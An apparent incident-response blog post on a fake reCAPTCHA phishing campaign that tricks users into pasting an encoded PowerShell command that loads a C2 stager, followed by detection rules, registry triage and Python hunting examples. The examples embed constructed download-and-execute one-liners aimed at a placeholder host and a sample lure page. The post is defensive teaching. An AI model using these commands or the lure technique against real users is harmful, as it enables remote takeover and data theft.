Author: Mohamed Osama, Senior Consultant Incident Response, NetWitness
Recently, a sophisticated phishing campaign mimicking reCAPTCHA, a CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) challenge, has been targeting unsuspecting employees across various sectors.
The campaign capitalizes on social engineering techniques, tricking victims into bypassing security measures by convincing them to paste malicious code into their systems. Using the familiar and trusted reCAPTCHA interface, attackers can lure employees into believing that they are merely verifying their identity to access legitimate websites or services, while in reality, they are inadvertently initiating a harmful process that compromises their machine.
Once the malicious code is executed, it installs an infostealer malware designed to siphon sensitive information from the infected device. This malware also establishes a backdoor, allowing attackers to remotely control the system through a Command-and-Control (C2) server. The lack of cybersecurity awareness among many employees has made this campaign particularly effective, as the phishing webpage appears authentic and exploits the perceived security of reCAPTCHA. This attack highlights the critical need for enhanced employee training and awareness to defend against evolving cyber threats.
The current campaign leverages multiple redirections across different websites, which finally end at the reCAPTCHA web page. It usually consists of a landing HTML page with an embedded, encoded mshta or PowerShell command line that downloads and invokes the malicious code. In addition, mshta, a Windows-native binary designed to execute Microsoft HTML Application (HTA) files, has also been observed being abused to download compressed ZIP files that are eventually decompressed to execute the infostealers on the compromised machine.
This campaign has been tracked by the NetWitness Incident Response team, among other vendors. It is known to install infostealer malware, specifically Lumma Stealer; however, in this blog post, I will leverage a stealthier fileless approach that leads directly to Command-and-Control (C2) and a complete takeover of the compromised machine by the threat actor.
Figure 1: Attack Diagram
The fake reCAPTCHA code has been publicly available on GitHub for many years as of the time of this blog. I used a publicly available reCAPTCHA GitHub repository whose code leverages an index.html landing web page that mimics the reCAPTCHA format, with additional instructions to paste a specific line that looks innocent enough to lure the user into completing the verification process.
Figure 2: Full view of fake reCAPTCHA web page
The available reCAPTCHA code, created purely for PoC purposes, is analyzed below.
Figure 3: Analysis of index.html
Figure 4: Analysis of recaptcha-verify.html
In this blog, I will only leverage the landing page, index.html, to execute a PowerShell command that downloads and invokes a malicious C2 stager inside a hidden, spawned PowerShell process. The C2 chosen is SilentTrinity, which was covered in detail in another blog post. This is another PoC where a fileless technique can be leveraged to initiate C2 communication directly with the threat actor, evading detection by multiple EPP (Endpoint Protection Platform) and EDR (Endpoint Detection and Response) solutions.
The attack unfolds as per the cyber kill chain below.
Figure 5: Cyber kill chain
The weaponization stage includes the attacker crafting a fake reCAPTCHA index.html by hardcoding a Base64-encoded PowerShell command, which downloads the SilentTrinity C2 stager.ps1 script and injects it into the memory of a hidden, spawned PowerShell process. Afterwards, the attacker creates suspicious websites that redirect to the malicious reCAPTCHA landing web page.
Figure 6: Customized index.html
The attacker's favored delivery method is a phishing email tricking the user into clicking an inserted hyperlink to the suspicious websites, thus ensuring that the user will be presented with the fake reCAPTCHA page.
The reCAPTCHA web page appears normal to untrained eyes, instructing the user to paste some content into the Run prompt of the machine. We can also notice that the entered phrase looks identical to the one in the instructions.
Figure 7: reCAPTCHA verification steps
Figure 8: Run prompt with reCAPTCHA lure message
However, scrolling backwards through the entered phrase reveals the actual command preceding the lure verification message.
Figure 9: Hidden command preceding lure message
Once the user clicks OK, the C2 implant is loaded and initiates stealthy communication and beaconing with the C2 server.
Figure 10: C2 stager pulled from C2 attack server
Figure 11: PowerShell checking in with C2 attack server
At this point, the threat actor has acquired full remote control over the compromised machine, where some local system enumeration commands are fired; however, the attack's magnitude can vary depending on the level of damage and impact the threat actor can inflict on the compromised machine and the corresponding corporate network.
Figure 12: System enumeration commands executed
From the NetWitness Endpoint perspective, during routine hunting activities, the analyst observed multiple Behaviors of Compromise (BOC) generated for peculiar PowerShell executions.
Figure 13: NetWitness Investigate page highlighting anomalous PowerShell activity
The analyst thoroughly checked the command line arguments and discovered multiple attempts to execute a PowerShell process with an encoded command leveraging the below flags:
The analyst also noticed a reCAPTCHA verification message following the executed commands.
Figure 14: Command line arguments executed by PowerShell
Focusing the analysis on the spawned PowerShell processes leads to the discovery of multiple generated MITRE ATT&CK and NetWitness alerts.
Figure 15: MITRE ATT&CK and NetWitness alerts generated
The analysis continues to uncover the PowerShell process map, where its parent process is identified as explorer.exe, the native Microsoft Windows GUI shell. The NetWitness process map points out multiple child processes spawned by PowerShell, such as whoami and netstat.
Figure 16: PowerShell process map
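The command-line flags, the trailing reCAPTCHA text and the explorer.exe parent with whoami/netstat children described above are exactly the features a hunting query should combine. The following is an added example (not NetWitness code and not part of the original post) that scores constructed process-creation events on those features: it decodes the -EncodedCommand payload (Base64 of UTF-16LE script text), looks for a download-and-invoke construct inside it, checks for the lure text and for the Run-prompt parent, and counts enumeration children. The switch names are real powershell.exe parameters; the sample events, the placeholder host stager.example.invalid and the alert threshold of three coinciding indicators are assumptions of this example.

```python
import base64
import re
from typing import Optional

# Switch patterns for powershell.exe. The switch names (-WindowStyle, -EncodedCommand,
# -NoProfile, -ExecutionPolicy and their abbreviations) are real PowerShell parameters;
# the sample events and the threshold below are constructed for this example.
SWITCHES = {
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I),
    "no_profile":      re.compile(r"-nop(?:rofile)?\b", re.I),
    "bypass_policy":   re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
}
# Download-and-invoke constructs a stager one-liner typically relies on.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b|Invoke-Expression|\biex\b",
    re.I)
# Trailing text that makes the Run prompt look like a CAPTCHA step.
LURE_TEXT = re.compile(r"reCAPTCHA|not a robot", re.I)
# Enumeration binaries often launched right after an implant checks in (the post shows whoami and netstat).
RECON_CHILDREN = {"whoami.exe", "netstat.exe", "systeminfo.exe", "ipconfig.exe", "nltest.exe"}


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries Base64 of the script text in UTF-16LE; None if it does not decode."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> dict:
    """Score one process-creation event; 'alert' when three or more indicators coincide."""
    cmd = event["cmdline"]
    findings = [name for name, pat in SWITCHES.items() if pat.search(cmd)]
    decoded = None
    m = SWITCHES["encoded_command"].search(cmd)
    if m:
        decoded = decode_encoded_command(m.group(1))
        if decoded and DOWNLOAD_CRADLE.search(decoded):
            findings.append("download_cradle_in_decoded_command")
    if LURE_TEXT.search(cmd):
        findings.append("recaptcha_lure_text")
    # The Run prompt belongs to explorer.exe, so that parent plus the flags above is the lure's shape.
    if findings and event["parent"].lower() == "explorer.exe":
        findings.append("spawned_by_explorer")
    if RECON_CHILDREN & {c.lower() for c in event.get("children", [])}:
        findings.append("recon_child_processes")
    return {"decoded": decoded, "findings": findings,
            "verdict": "alert" if len(findings) >= 3 else "benign"}


# Constructed stager one-liner with a placeholder host, used only to build a realistic sample event.
STAGER_ONE_LINER = "IEX (New-Object Net.WebClient).DownloadString('http://stager.example.invalid/stager.ps1')"
ENC = base64.b64encode(STAGER_ONE_LINER.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [  # constructed process-creation events, not telemetry from the post
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": f'powershell.exe -w hidden -nop -ep bypass -enc {ENC} # "reCAPTCHA Verification ID: 7421"',
     "children": ["whoami.exe", "netstat.exe"]},
    {"parent": "explorer.exe", "image": "powershell.exe",      # user opening an interactive console
     "cmdline": "powershell.exe", "children": []},
    {"parent": "cmd.exe", "image": "powershell.exe",           # scheduled maintenance script
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1", "children": []},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        result = analyze_event(ev)
        print(result["verdict"], result["findings"])
```

Only the first event reaches the threshold; the interactive console and the -NoProfile maintenance script each trip at most one indicator, which is why the rule keys on the combination rather than on any single flag.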
As I did not utilize the second web page (reCAPTCHA-verify) of the PoC in this attack scenario, it is not highlighted in the previous detection section. However, leveraging another web page, or even mshta, to download malicious content onto the victimized machine would be easily detected through the following Behavior of Compromise (BOC) populated values.
boc = 'lolbas initiates network connections','mshta runs powershell'
Figure 17: Suspicious mshta activity
Figure 18: Command line argument executed by mshta
Figure 19: Generated BOCs for mshta running PowerShell
As the analysis continues, the analyst shifts the investigation towards the packet perspective, discovering multiple anomalous HTTP protocol characteristics populating values under the analysis.service meta key. This is coupled with alarming MITRE ATT&CK techniques and tactics, along with non-standard TCP ports used in the communication.
Figure 20: Peculiar HTTP communication over non-standard ports
The analyst took a deeper dive into this communication, where a hardcoded PowerShell command is discovered within an HTML file representing the server's response.
Figure 21: Raw packet analysis showing encoded PowerShell command
The analyst reconstructed the raw packet into its original form, a web page, which was clearly a loaded reCAPTCHA page holding some strange instructions to follow.
Figure 22: reCAPTCHA web page reconstructed by NetWitness
Following the logical investigation stream, the analyst focused the analysis on all communication between the possibly compromised machine and the anomalous web server simulating a reCAPTCHA web page. Accordingly, other indicators surfaced, leading to the discovery of SilentTrinity C2, as shown below.
Figure 23: SilentTrinity IOCs generated by NetWitness
Figure 24: C2 stager GET request by the victim machine
Figure 25: C2 Beaconing and Communication
To build a detection rule that triggers upon the discovery of plaintext keywords within a raw packet (e.g., an HTML page), the NetWitness Search Pattern rule can easily be leveraged. However, if NetWitness Packets is on version 12.3 or earlier, a possible workaround is to leverage the built-in native SEARCH parser, which can be enabled from the NetWitness Decoder config page; it loads its configuration from the search.ini file, found under the same Decoder config page.
Figure 26: Native SEARCH parser
The below lines can be added to the search.ini file.
[reCAPTCHA_Detected]
Services=80;8080;8000
Keywords= reCAPTCHA ;Captcha ;textToCopy ;copy ;commandToRun ;powershell
Case=0
[execCommand_JavaScript_Method_Detected]
Services=80;8080;8000
Keywords= document.execCommand
Case=0
Figure 27: Customized search.ini file
The logic of the above configuration lines is to look for specific keywords, such as document.execCommand (a JavaScript method) among others, whose discovery in traffic would be alarming. The Decoder's parsers need to be reloaded afterwards, from the Decoder's explore page.
Figure 28: Parser's reload signal
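To make the behaviour of the two search.ini stanzas above concrete before deploying them, here is an added example (my own code, not NetWitness's SEARCH parser) that parses the stanzas in the post's format and runs them over constructed server responses. The matching semantics it assumes are assumptions, not documented NetWitness behaviour: Case=0 is treated as case-insensitive, whitespace around each keyword is trimmed, any single keyword hit is enough to fire a stanza, and Services restricts which destination ports are inspected. The two HTTP responses are constructed stand-ins, the first for the reconstructed lure page of Figure 22 and the second for an ordinary page that merely mentions a captcha.

```python
# Constructed model of the search.ini stanzas from the post (not NetWitness code). Assumed
# semantics: Case=0 means case-insensitive, keywords are trimmed, any single hit fires.
SEARCH_INI = """\
[reCAPTCHA_Detected]
Services=80;8080;8000
Keywords= reCAPTCHA ;Captcha ;textToCopy ;copy ;commandToRun ;powershell
Case=0
[execCommand_JavaScript_Method_Detected]
Services=80;8080;8000
Keywords= document.execCommand
Case=0
"""


def parse_search_ini(text: str) -> dict:
    """Parse [section] / Services / Keywords / Case stanzas into a rule table."""
    rules, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            rules[current] = {"services": set(), "keywords": [], "case_sensitive": False}
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            key = key.strip().lower()
            if key == "services":
                rules[current]["services"] = {int(p) for p in value.split(";") if p.strip()}
            elif key == "keywords":
                rules[current]["keywords"] = [k.strip() for k in value.split(";") if k.strip()]
            elif key == "case":
                rules[current]["case_sensitive"] = value.strip() == "1"
    return rules


def scan_stream(rules: dict, dst_port: int, payload: str) -> dict:
    """Return {stanza_name: [matched keywords]} for one reassembled TCP payload."""
    hits = {}
    for name, rule in rules.items():
        if dst_port not in rule["services"]:
            continue  # Services limits inspection to the listed ports
        hay = payload if rule["case_sensitive"] else payload.lower()
        matched = [k for k in rule["keywords"]
                   if (k if rule["case_sensitive"] else k.lower()) in hay]
        if matched:
            hits[name] = matched
    return hits


# Constructed server responses: a minimal stand-in for the lure page, and an ordinary page.
LURE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    "<html><body><h2>reCAPTCHA</h2><p>Verify you are human</p>"
    '<textarea id="textToCopy" style="display:none">powershell -w hidden -enc QUFB</textarea>'
    '<script>function verify(){document.getElementById("textToCopy").select();'
    'document.execCommand("copy");}</script></body></html>'
)
BENIGN_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    "<html><body><p>Our contact form uses a captcha to stop spam bots.</p></body></html>"
)

if __name__ == "__main__":
    rules = parse_search_ini(SEARCH_INI)
    for port, body in [(80, LURE_RESPONSE), (80, BENIGN_RESPONSE), (443, LURE_RESPONSE)]:
        print(port, scan_stream(rules, port, body))
```

The benign page fires the first stanza on the single generic keyword "Captcha", which is expected noise; what separates the lure is the co-occurrence of textToCopy, copy, powershell and document.execCommand in one response, so the Application rule built on the IOC meta key is best keyed on that combination. The third case shows the other limit of a Services-scoped plaintext parser: the same lure served on port 443 produces no hits because the Services list does not include it, and the payload would be TLS-encrypted in any case.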
Afterwards, an Application rule can be created to alert on the Indicators of Compromise (IOC) meta key.
Figure 29: reCAPTCHA Application rule condition
At this point, if a raw packet exposes the configured keywords, NetWitness would alert as below.
Figure 30: reCAPTCHA application rule triggered
At this stage of the analysis, the analyst should be able to quickly triage the compromised machine. Multiple approaches can be applied. One of the most effective is to analyze the RunMRU (Run Most Recently Used) registry key, which is populated when a user enters a command into the START > Run prompt. Entries are logged in the user hive under this path.
Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Based on the collected artifact below, the analyst identifies an encoded PowerShell command executed in the Run prompt of this specific user. This confirms that the victimized user followed the malicious reCAPTCHA instructions.
Figure 31: Analysis of RunMRU registry hive
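The RunMRU triage above can be scripted so that a responder gets the Run-prompt history in order and with the encoded entry already decoded. The following is an added example (not part of the original post) that reconstructs the ordering from the key's layout: each command is stored as a REG_SZ value named with a single letter and suffixed with the literal two characters "\1", and the MRUList value holds those letters most-recent-first. The triage logic flags entries that launch powershell, pwsh or mshta together with an encoded command or the reCAPTCHA lure text; the RunMRU values are constructed sample data, the placeholder host stager.example.invalid is an assumption, and the live reader only runs on Windows.

```python
import base64
import re
import sys
from typing import Optional

# Path from the post, relative to the user's hive (HKCU when the user is logged on).
RUNMRU_PATH = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

LAUNCHER = re.compile(r"^\s*(?:powershell(?:\.exe)?|pwsh(?:\.exe)?|mshta(?:\.exe)?)\b", re.I)
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
LURE = re.compile(r"reCAPTCHA|not a robot", re.I)


def read_runmru(values: dict) -> list:
    """Order RunMRU commands most-recent-first using MRUList and strip the '\\1' suffix."""
    entries = []
    for letter in values.get("MRUList", ""):
        if letter in values:
            entries.append(values[letter].removesuffix("\\1"))
    return entries


def triage_entry(command: str) -> dict:
    """Flag a Run-prompt entry that launches a script host with an encoded command or lure text."""
    launcher = LAUNCHER.search(command)
    enc = ENCODED.search(command)
    decoded: Optional[str] = None
    if enc:
        try:  # -EncodedCommand is Base64 of UTF-16LE script text
            decoded = base64.b64decode(enc.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            decoded = None
    lure = bool(LURE.search(command))
    return {"command": command,
            "launcher": launcher.group(0).strip() if launcher else None,
            "decoded": decoded,
            "lure_text": lure,
            "suspicious": bool(launcher) and (enc is not None or lure)}


def triage_runmru(values: dict) -> list:
    """Triage every entry, most recent first."""
    return [triage_entry(cmd) for cmd in read_runmru(values)]


def live_runmru_values() -> dict:
    """Read the current user's RunMRU on Windows; returns {} on other platforms."""
    if sys.platform != "win32":
        return {}
    import winreg
    values, i = {}, 0
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUNMRU_PATH) as key:
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, i)
            except OSError:  # no more values
                break
            values[name] = data
            i += 1
    return values


# Constructed RunMRU values (not from the post). The encoded payload is a placeholder one-liner.
_PLACEHOLDER = "iwr http://stager.example.invalid/s.ps1 | iex"
_ENC = base64.b64encode(_PLACEHOLDER.encode("utf-16-le")).decode("ascii")
SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": f'powershell -w hidden -enc {_ENC} # "reCAPTCHA Verification ID: 7421"\\1',
    "MRUList": "cba",
}

if __name__ == "__main__":
    for entry in triage_runmru(live_runmru_values() or SAMPLE_RUNMRU):
        print("SUSPICIOUS" if entry["suspicious"] else "ok", entry["command"][:70], entry["decoded"])
```

On a live Windows host the script reads HKCU directly; for an offline NTUSER.DAT the same value layout applies, so the parsing functions can be fed values exported from that hive. MRUList order is the only ordering information in the key, as the entries carry no timestamps; correlate with the key's last-write time when a timeline is needed.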
Accordingly, another approach that can be extremely useful during the light forensics phase is to acquire the PowerShell process's memory and pinpoint the injected malicious code.
Figure 32: PowerShell memory dump analysis showing executed command
Figure 33: Whoami command captured in the analyzed PowerShell process memory
Figure 34: Abstract of the injected C2 PowerShell script into the process' memory
Cybersecurity awareness is a fundamental component of an organization's security posture, as even the most robust technical defenses can be undermined by an uninformed employee making a simple mistake. Innocent actions, such as clicking on a phishing link or unknowingly executing malicious code from a fake reCAPTCHA page, can lead to critical breaches, allowing attackers to bypass security controls and infiltrate the network. This underscores the importance of continuous security training for all staff, combined with the implementation of advanced detection and response technologies like Network Detection and Response (NDR), Endpoint Detection and Response (EDR), and Security Information and Event Management (SIEM). These technologies work together to monitor and detect suspicious activity, provide visibility across the network, and enable swift incident response, ensuring that human error is mitigated by layered defenses and proactive security measures.